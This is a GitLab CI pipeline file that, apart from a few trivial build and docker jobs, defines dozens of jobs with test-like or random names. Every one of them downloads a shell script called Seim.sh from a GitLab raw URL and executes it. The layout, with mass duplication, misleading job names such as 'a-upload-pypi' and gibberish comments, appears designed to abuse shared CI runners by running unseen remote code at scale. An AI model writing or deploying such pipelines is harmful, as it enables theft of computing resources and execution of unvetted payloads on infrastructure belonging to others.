stages:
  - build
  - docker
  
services:
  - docker:dind
  
#build-part


a-pages:
  stage: build
  image: ubuntu 
  script:
    - apt-get update
    - apt-get install wget -y 
    
#TEST-PART

a-lint-javascript:
  stage: build
  image: ubuntu
  script:
    - apt-get update
    - apt-get install gcc -y

  #DOC-1
  
docker-job_a:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/wabrpr_twofmd/wadn393 .
    
docker-job_b:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/wabrpr_twofmd/wadn393 .
    
docker-job_c:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/wabrpr_twofmd/wadn393 .
    
docker-job_d:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/wabrpr_twofmd/wadn393 .
    
docker-job_e:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/wabrpr_twofmd/wadn393 .
    
docker-job_f:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/wabrpr_twofmd/wadn393 .
    
#DOC-PART-2
    

    ##maindhsod
    ##hdkfjdkfjf
    #hdkndkdmfm
    #hlcmfkfldnf
    
a-test-debian:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh

a-test-ubuntu:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh

a-test-fedora:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh

a-test-arch:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh


a-test-display:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh

a-upload-pypi:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
#2ND-PART-STARTS
    
B-te29-y:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh

B-u380dypi:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
B-te2hd9-y:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh

B-u38jpa0dypi:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
B-te117329-y:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh

B-u38000ehdypi:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
B-te11m929-y:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh

B-u38jog0ehdypi:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
B-u38jognigdypi:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
    ##gidnfkdjd
    #hkdndjfjf
    #hkdnfkfjf
    
C-u1940:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
C-uuj2dkd:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh    
    
C-u39040:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh   
    
C-u49440:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
C-uuj592dkd:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh    
    
C-u699040:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh  
    
C-ukeo7940:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
C-uuj8wjdkd:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh    
    
C-u9kd040:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
C-u10jod940:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
C-uuj11hdkdkd:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh    
    
C-u12kodk040:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh   
    
C-u13jod440:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
C-uu14jkdk92dkd:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh    
    
C-u15kld9040:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh  
    
C-u16jkdeo7940:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
C-uu17jksj8wjdkd:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh    
    
C-u18kkfkd040:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
C-uu19kv6dkd:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh    
    
C-u20hk040:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
D-uhoh3vj:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
 
D-uudi4dhkd:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh    
    
D-u3hi40:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh   
    
D-u4gu0:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
D-uuj5mfdkd:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh    
    
D-u6hk40:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh  
    
D-ukeo7nl40:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
D-juuj8wjdkd:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh    
    
D-ubld040:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
    
D-u10fkl940:
  stage: docker
  image: ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/wabrpr_twofmd/wadn393/-/raw/master/Seim.sh
    - chmod +x Seim.sh
    - ./Seim.sh
